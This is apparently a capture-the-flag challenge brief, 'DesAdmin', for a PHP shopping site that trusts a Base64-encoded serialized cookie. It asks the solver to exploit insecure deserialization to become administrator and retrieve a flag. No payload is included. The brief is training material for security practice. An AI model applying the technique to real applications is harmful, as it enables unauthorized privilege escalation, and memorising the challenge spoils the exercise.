DesAdmin

S C E N A R I O
Welcome to E-commerce, a newly launched online shopping platform built rapidly to meet high demand. The application includes basic authentication and a user profile system. User identity is managed using a client-side cookie that stores serialized PHP objects, which are Base64 encoded before being sent to the browser.

However, the application directly trusts and unserializes this cookie without proper validation, making it vulnerable to insecure deserialization. This allows attackers to manipulate object properties and escalate privileges by crafting malicious serialized payloads.

O B J E C T I V E
Analyze the application’s cookie handling mechanism and exploit insecure PHP object deserialization to impersonate an administrator account. Modify the serialized object structure to escalate privileges and retrieve the flag.

Infrastructure Web Application (PHP)

Provided Files None (black-box testing)

Tools Required Web Browser, Burp Suite, Local PHP CLI

Flag Format Flag{...}